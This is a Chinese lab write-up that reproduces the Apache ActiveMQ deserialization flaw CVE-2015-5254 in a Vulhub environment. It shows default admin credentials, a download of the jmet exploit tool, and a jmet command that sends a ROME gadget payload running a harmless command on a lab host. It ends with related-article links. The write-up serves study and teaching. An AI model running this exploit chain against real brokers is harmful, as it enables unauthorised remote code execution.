ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-CSDN博客_kali搭建靶场
原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。
Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙“发送”东西的时候,允许被夹带私货,而且这个私货可以被构建成反序列化的类,刚好这个反序列化的类又能被执行,这个样子。
操作流程参考:Vulhub - Docker-Compose file for vulnerability environment
获得的知识:5.13.0前的apache可能“挨揍”;这是个出现在中间件类型的漏洞,同时利用反序列化函数
流程:①登入管理②然后去下载被构建好的“私货”③让“私货”被执行④弹出shell)
①:登入 ip:8161
我的IP是:10.10.10.128
点击Manage ActiveMQ broker(管理ActiveMQ代理)账号/密码 admin/admin
②下载
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
③
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 10.10.10.128 61616
查看队列进程
④
docker-compose exec activemq bash
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现相关推荐
- FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
- Apache Shiro remember Me反序列化漏洞(Shiro 550)复现
Apache Shiro remember Me反序列化漏洞(Shiro 550)复现 什么是Shiro Apache Shiro™是一个强大且易用的Java安全框架,能够用于身份验证.授权.加密和会 ...
- jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
- Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551的漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低.影响范围为10.3.6.0.0, 12.1. ...
- Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 Burpsuite抓包改包->信息被爆出 0x01漏 ...
- java栈溢出漏洞cve,TP-Link WR841N 栈溢出漏洞(CVE-2020-8423)分析
简介 前段时间 TP-LINK TL-WR841N 设备爆出了一个认证后的栈溢出漏洞,借机复现了一下这个栈溢出漏洞,其中有一些在漏洞利用上的小技巧在此和大家分享一下. 漏洞信息如下: 漏洞编号:CVE ...
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- 【web攻防】破壳漏洞【CVE-2014-6271】与心脏滴血漏洞 【CVE-2014-0160】 docker 复现 学习过程
其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思. 虽然相比以前的确有了一点进步,但我 ...
- Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)莫得复现
漏洞简介 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行 ...
- Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)漏洞复现
目录 免责声明: CVE-2022-30190漏洞复现 漏洞概述: 影响版本: 漏洞复现: 使用方法: 利用: 修复建议: 参考: 免责声明: 本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他 ...
最新文章
- android 使用广播监听网络状态
- 结构方程模型_简单易懂,结构方程模型思路总结
- 【机器学习入门到精通系列】无监督学习之K-means
- 应用Java程序片段动态生成下拉列表
- 20145236《信息安全系统设计基础》第0周学习总结
- hal库开启中断关中断_stm32的HAL库开发学习笔记之外部中断
- bzoj 1040: [ZJOI2008]骑士
- Linux学习134 Unit 4
- Win8系统108个运行命令
- 关于appium踩坑 selenium.common.exceptions.WebDriverException: Message: An unknown server-side error(已解决)
- 推荐系统(3):倒排索引在召回中的应用
- Linux下重启磁盘盘符会变,linux系统 重启盘符错乱问题
- 剑侠单机版显示服务器正在维护,12.6服务器维护公告:修复大量BUG+游戏内容
- UTON便携式硬件冷钱包 安全实用易上手
- ant design分享记录-icon图标自定义菜单图标
- 虚拟机和服务器如何分辨率,电脑如何设置虚拟机VMware分辨率|VMware怎么设置全屏...
- ubuntu 3D 快捷键
- python segy格式地震数据读写包segyio学习笔记(二)
- 2022双十一新规则解读
- imail邮件服务器的安装,IMail 的安装和设置 图文教程